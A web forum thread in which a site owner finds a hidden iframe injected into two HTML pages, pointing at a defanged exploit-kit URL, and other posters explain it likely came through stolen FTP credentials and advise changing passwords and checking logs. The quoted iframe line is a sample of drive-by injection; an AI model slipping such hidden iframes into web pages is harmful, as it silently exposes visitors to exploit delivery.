Ever seen spyware that adds itself to html on your computer ?

[noooze]

found this in some html that i have NOT added myself

i know i had some spyware for a few days untill i removed it

this was the line added

</body><IFRAME name="StatPage" src="hxxxxxp://worldwideweb.xuiputalo.com/new_sploit/index.php" width=5 height=5 style="display:none"></IFRAME>

what the **** - have you ever seen this before ?

[atariFu]

Thats a nifty trick, probably not new but still interesting. How many html files did it get?

[noooze]

2 pages - and i didnt notice due to a popup blocker - good thing it wasnt online for long.

think it adds itself as you save and close

[Toby]

It's most likely being added at the server, not by your PC.

[cd34]

That was added through FTP access to your webserver.

Very common. Your password has been leaked somewhere, perhaps through spyware/keyloggers, or, a vendor that you have given the password to which installed software, and you never changed the password after they were done.

[amadman]

Yeah... this sucks.
Had it happen to me not long ago. (Thanks for the help Sparky!)

Change your password!

[Beaver Bob]

for security, its always best to change your passwords frequently.. every month or two at least.

[noooze]

damn... so someone downloaded my index pages and uploaded them again ?

hmm i'd better change password , go though ftp log, and talk to the police one good thing is that i can report it, and if the same ip turns up serveral places, someone might wanna do something about it

[WebairVictor]

too many of them there...

[noooze]

well... sometimes i cant help think - why not try to fight back.. maybe i cant do anything, but what if 2000 like me report it ?

i donno

[juggernaut]

Quote:

Originally Posted by noooze

well... sometimes i cant help think - why not try to fight back.. maybe i cant do anything, but what if 2000 like me report it ?

i donno

Unfortunatly nothing is going to happen. Ever try and send a email to a "report at com" addy. It goes no place. 1) most people don't even know how to set up multible profiles to check that mail at all time while checking their own. 2) they prob get so filled with mail why would they want to.
Cd will attest that most of this stuff happens when a server admin or host is either sleeping at the wheel and not updating their shit. Not knoweldgeble enough (there are plently running very strong business who can't even spell server let alone manage one correctly). Or just not keeping up to date with the bad guys out there.
In order to change your site someone needs to have write access to the file/folder and that is not to easy to get if the servers permissions are correct and system updated (MS or LX). Or you just give out your password, write it on the bottom of your favor coffee mug or do what most people do and just stick it right on the monitor with a post it note.
If it were me I would be happy of the easy fix. Do a search and replace on the code of all your files. Look over the logs for shits and giggles and block the IP. But fact is they will keep comming from some other place so that is kind of a waste but still a good practice and can't hurt. Me I block all countries that have mostly low to no income. You know the odds of the person comming to your site and paying with their own creditcard is slim. My cam site is open to the world as most of the girls come from countries I would love to block.